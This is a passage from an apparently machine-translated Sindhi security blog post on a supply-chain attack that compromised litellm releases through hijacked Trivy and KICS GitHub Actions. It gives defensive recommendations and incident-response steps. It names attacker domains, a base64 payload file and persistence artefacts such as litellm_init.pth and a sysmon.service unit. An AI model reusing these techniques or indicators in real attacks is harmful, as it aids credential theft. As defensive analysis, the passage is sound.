  • ايگريس نيٽ ورڪ ڪنٽرول لاڳو ڪريو. خارج ٿيڻ models.litellm.cloud ۽ C2 پولنگ کي checkmarx.zone پيداوار جي ماحول ۾ الائو لسٽ تي ٻڌل ايگريس فلٽرنگ ذريعي پڪڙي سگهجي ها.

پيڪيج سنڀاليندڙن لاءِ

  • پن CI/CD پاران ڪارروايون commit SHA، ٽيگ نه. لائيٽ ايل ايل ايم جي pipeline پن ٿيل ورزن کان سواءِ ٽريوي استعمال ڪيو. جيڪڏهن اهو حوالو ڏئي ها aquasecurity/trivy-action@<commit-sha> جي بدران @latest، سمجهوتو ٿيل ڪارروائي عمل ۾ نه اچي ها.
  • مختصر مدت وارا، دائري وارا اشاعتي ٽوڪن استعمال ڪريو. PyPI قابل اعتماد پبلشرز (OIDC-based) ۽ اسڪوپ ٿيل API ٽوڪن کي سپورٽ ڪري ٿو. PYPI_PUBLISH ٽوڪن کي ڊگهي عرصي تائين، غير محدود اشاعت جي رسائي نه هجڻ گهرجي ها.
  • PyPI تي ٻن عنصرن جي تصديق کي فعال ڪريو. سڀني سنڀاليندڙن لاءِ 2FA جي ضرورت آهي ۽ جتي ممڪن هجي هارڊويئر سيڪيورٽي ڪيز استعمال ڪريو.
  • پيڪيجز تي دستخط ڪريو. سگسٽور/پي اي پي 740 تصديقون صارفين کي تصديق ڪرڻ جي اجازت ڏين ٿيون ته هڪ پيڪيج متوقع طرفان ٺاهيو ويو هو CI/CD pipeline، چوري ٿيل ٽوڪن سان حملي آور طرفان نه.

پليٽ فارم آپريٽرز لاءِ (PyPI، npm، GitHub)

  • غير معمولي اشاعت جي نمونن کي ڳوليو. ٻه نوان ورجن جيڪي 13 منٽن جي وقفي سان شايع ٿيا آهن، معمول کان مختلف IP يا ٽوڪن کان، پيڪيج جي انسٽال ٿيڻ کان اڳ هولڊ فار ريويو يا خودڪار اسڪيننگ کي شروع ڪرڻ گهرجي.
  • قابل اعتماد پبلشرز جي اپنائڻ کي تيز ڪريو. OIDC تي ٻڌل پبلشنگ پيڪيجز کي مخصوص ذخيرن ۽ ورڪ فلو سان ڳنڍي ٿي، چوري ٿيل ٽوڪن کي اصل کان ٻاهر بيڪار بڻائي ٿي. CI/CD حوالي
  • پبلش ٽائيم مالويئر اسڪيننگ لاڳو ڪريو. proxy_server.py ۾ base64-ڊيڪوڊ ٿيل پيل لوڊ اشاعت جي وقت تي جامد تجزيو ذريعي ڳولي سگهجي ٿو.

ماحولياتي نظام لاءِ

  • سيڪيورٽي اوزارن کي نازڪ انفراسٽرڪچر طور سمجهو. ٽريوي ۽ چيڪ مارڪس KICS لکين ماڻهن پاران استعمال ڪيا ويندا آهن pipelines. انهن جي GitHub ايڪشنز کي ساڳئي سختي سان سائن ڪيو وڃي، پن ڪيو وڃي، ۽ مانيٽر ڪيو وڃي جيئن اهي پيڪيجز اسڪين ڪن ٿا.
  • رن ٽائم ڳولڻ ۾ سيڙپڪاري ڪريو. صرف جامد تجزيو هر مبهم ٽيڪنڪ کي پڪڙي نٿو سگهي. پيڪيج انسٽال جي رن ٽائم مانيٽرنگ hooks، غير متوقع نيٽ ورڪ ڪنيڪشن، ۽ مشڪوڪ فائل رسائي جا نمونا کوٽائي ۾ دفاع فراهم ڪن ٿا.
  • خطري جي انٽيليجنس کي تيزيءَ سان شيئر ڪريو. ليٽيلم لاءِ 5.5 ڪلاڪ جي نمائش واري ونڊو تيز ڪراس-وينڊرز ڪوآرڊينيشن سان ننڍو ٿي سگهي ها. زائيگيني ايم ڊبليو، ساکٽ، ۽ سنيڪ جهڙين خودڪار اسڪيننگ سروسز انوملي کي ڳولي لڌو - رڪاوٽ انساني تصديق ۽ رجسٽري جوابي وقت آهي.

ٿڪل

ٽيم پي سي پي مهم هڪ اهم لمحو آهي software supply chain security. پهرين سيڪيورٽي اسڪينرن سان سمجهوتو ڪندي ۽ انهن کي اعليٰ قدر واري AI انفراسٽرڪچر لاءِ قدم جي طور تي استعمال ڪندي، حملي آورن اهو ظاهر ڪيو ته سپلائي چين صرف ان جي ڪمزور ترين منتقلي انحصار جيتري مضبوط آهي، ۽ اهو انحصار شايد سيڪيورٽي اوزار هجي جيڪو توهان کي محفوظ رکڻ لاءِ ڀروسو ڪيو.

لٽيلم سمجهوتو خاص طور تي اي آءِ انفراسٽرڪچر لاءِ وڌندڙ خطري کي اجاگر ڪري ٿو. جيئن ته ايل ايل ايم پراڪسي گيٽ وي بڻجي ويندا آهن standard لاءِ نمونو enterprise AI جي تعیناتي، اهي هڪ ئي جزو ۾ API ڪيز، ڪلائوڊ سندون، ۽ حساس ڊيٽا تائين رسائي تي ڌيان ڏين ٿا. انهي جزو کي سمجهوتو ڪرڻ پوري AI اسٽيڪ جي هڪ اسڪيليٽن ڪي آهي.

اهي تنظيمون جيڪي 5.5 ڪلاڪن جي ونڊو دوران litellm 1.82.7 يا 1.82.8 انسٽال ڪن ٿيون، انهن کي هن کي مڪمل سندي سمجهوتو سمجهڻ گهرجي: متاثر ٿيل سسٽم تي سڀني رازن کي گھمايو، ڪبرنيٽس ڪلسٽرن جو آڊٽ ڪريو node-setup-* پوڊس ان kube-system، ڪو به هٽايو sysmon.service سسٽمڊ يونٽ، ۽ چيڪ ڪريو litellm_init.pth پٿون ۾ site-packages/ ڊائريڪٽريز. سرڪاري ڊاڪر تصوير جا استعمال ڪندڙ (ghcr.io/berriai/litellm) متاثر نه ٿيا، ڇاڪاڻ ته تصوير پنهنجي انحصار کي پن ڪيو ۽ ايڪسپوزر ونڊو دوران ٻيهر تعمير نه ڪيو ويو.

جي باري ۾ الاهي

ڪو-باني ۽ CTO

Luis Rodriguez زائيگيني سيڪيورٽي ۾ شريڪ باني ۽ سي ٽي او آهي. ايپليڪيشن سيڪيورٽي ۾ 20+ سالن سان، هو ايپ سيڪ تحفظ ۽ جديد ڪوڊ-تجزيي جي صلاحيتن تي ڌيان ڏئي ٿو جيڪي ٽيمن کي حقيقي ترسيل خطري کي گهٽائڻ ۾ مدد ڪن ٿيون.

 
اسڪا-ٽولز-سافٽ ويئر-ڪمپوزيشن-تجزيو-ٽولز
پنهنجي سافٽ ويئر خطرن کي ترجيح ڏيو، درست ڪريو، ۽ محفوظ ڪريو
پنهنجو مفت اڪائونٽ حاصل ڪريو.
ڪنهن به ڪريڊٽ ڪارڊ جي ضرورت نه آهي.

پنهنجي سافٽ ويئر ڊولپمينٽ ۽ پهچائڻ کي محفوظ بڻايو

زائيگيني پراڊڪٽ سوٽ سان